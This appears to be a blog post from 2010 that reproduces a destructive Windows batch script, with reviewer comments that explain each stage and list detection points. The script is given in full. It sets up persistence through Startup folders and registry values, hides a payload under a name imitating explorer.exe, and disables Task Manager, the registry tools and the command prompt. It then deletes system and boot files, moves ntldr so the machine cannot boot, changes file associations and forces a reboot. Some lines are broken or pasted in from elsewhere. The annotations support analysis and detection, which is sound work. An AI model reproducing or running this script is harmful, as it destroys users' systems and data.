Selasa, 02 Maret 2010

batch made by ferdy

rem ---------------------------------------------------------------------------
rem Analyst notes (added in review). This listing is a destructive Windows
rem batch script written for XP-era systems. It shows three behaviours:
rem   1. Persistence: Startup-folder copies, Run/Winlogon registry values,
rem      and a win.ini entry.
rem   2. Defence impairment: policy values that disable Task Manager, the
rem      registry tools and the command prompt.
rem   3. Destruction: deleting boot-related files, relocating ntldr, deleting
rem      from %systemroot%, then forcing a reboot.
rem Useful detection points: writes to the Startup folders, changes to the
rem Winlogon Shell/System and Run values, the DisableTaskMgr and
rem DisableRegistryTools policy values, "attrib +s +h" on executables in
rem %SYSTEMROOT%, and an unexpected "shutdown -r -f".
rem ---------------------------------------------------------------------------

rem Startup-folder persistence: copy the payload into the Startup paths shown.
rem Each attrib call marks ferdy.exe in the current directory as
rem system + hidden + read-only.
copy ferdy.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\”
attrib ferdy.exe +s +h +r
copy ferdy.exe “%USERSPROFILE%\Start Menu\Programs\Startup\”
attrib ferdy.exe +s +h +r
rem Decoy message for the user (Indonesian for "please wait a moment").
echo silahkan tunggu sebentar....
rem Quietly delete four files under system32, with output discarded by >nul.
rem The names point to boot-related components and the registry editor
rem (regedt32.exe). Recovery means restoring them from trusted media.
del "c:\windows\system32\bootok" /q/s >nul
del "c:\windows\system32\bootvid.dll" /q /s >nul
del "c:\windows\system32\bootvrfy" /q /s >nul
del "c:\windows\system32\regedt32.exe" /q /s >nul
rem Masquerading: rename the payload to explorers.exe, a near-match for the
rem legitimate explorer.exe, then copy it into %SYSTEMROOT% and system32,
rem also under the name svchost.bat.
ren ferdy.exe explorers.exe
copy explorers.exe %SYSTEMROOT%\
copy explorers.exe %SYSTEMROOT%\svchost.bat
copy explorers.exe %SYSTEMROOT%\system32\
copy explorers.exe %SYSTEMROOT%\system32\svchost.bat
rem Repeat the Startup-folder copies under the new name and hide the file.
copy explorers.exe “%ALLUSERSPROFILE%\Start Menu\Programs\Startup\”
attrib explorers.exe +s +h +r
copy explorers.exe “%USERSPROFILE%\Start Menu\Programs\Startup\”
attrib explorers.exe +s +h +r
rem Registry persistence attempts: the App Paths default value, the Winlogon
rem "System" and "Shell" values in both HKLM and HKCU, a Policies\System
rem "Shell" value, and a Run value named "explorer". Winlogon\Shell and Run
rem are standard autostart locations worth monitoring for changes.
reg add “HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\App Paths” /ve /d %systemroot%\explorers.exe /t reg_dword /d 0 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v System /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v System /d explorers.exe /t reg_dword /d 0 /f
reg add “HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System” /v Shell /d explorers.exe /t reg_dword /d 0 /f
reg add “HKCU\Software\Microsoft\Windows\CurrentVersion\Run” /v explorer /d explorers.exe /t reg_dword /d 0 /f
rem Hide the copies placed in system32 and in %SYSTEMROOT%.
cd %SYSTEMROOT%\system32\
attrib explorers.exe +s +h +r
cd %SYSTEMROOT%\
attrib explorers.exe +s +h +r
rem Append a [ferdy] section holding the payload path to win.ini in the
rem current directory (%SYSTEMROOT% after the cd above).
echo [ferdy] >> win.ini
echo path=%SYSTEMROOT%\explorers.exe >>win.ini
rem Boot sabotage: in the root of the system drive, clear the attributes on
rem ntldr, rename it to "ferdy", move it into system32 and hide it. ntldr is
rem the NT/XP boot loader, so the next boot is expected to fail until the
rem file is restored to the drive root.
cd %systemdrive%\
attrib ntldr -s -h -r
ren ntldr ferdy
move /y ferdy %systemroot%/system32
attrib ferdy +s +h +r
rem Defence impairment: set the per-user policy values disableregistrytools
rem and disabletaskmgr to 1.
reg add "HKCU\software\microsoft\windows\currentversion\policies\system" /v disableregistrytools /t reg_dword /d 1 /f
reg add "HKCU\software\microsoft\windows\currentversion\policies\system" /v disabletaskmgr /t reg_dword /d 1 /f
rem NOTE(review): the following WshShell.* lines are Windows Script Host
rem object calls (RegDelete / RegWrite), not batch commands. They look
rem pasted from a separate script. They reference the same policy values and
rem the Winlogon Shell value, each wrapped across two lines on the page.
WshShell.RegDelete “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\DisableRegistryTools”
WshShell.RegDelete “HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\
Policies\System\DisableTaskMgr”
WshShell.RegWrite “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\
Winlogon\Shell”,”explorers.exe”
WshShell.RegDelete “HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\
Policies\System\Shell”
WshShell.RegDelete “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\
Policies\System\Shell”
rem File-association tampering through assoc, followed by another attrib
rem call on explorers.exe.
assoc .*=.f3rdy
attrib explorers.exe +s +h +r
rem Writes a disablecmd value of 2 under the HKCU key path exactly as shown.
reg add "hkcu\softaware\microsoft\windows\currentversion\policies\system" /v disablecmd /t reg_dword /d 2 /f
rem Final stage: delete from %systemroot%, then force a restart after one
rem second (-r restart, -t 1 delay, -f force-close applications).
del %systemroot%
shutdown -r -t 1 -f
exit p/a/q
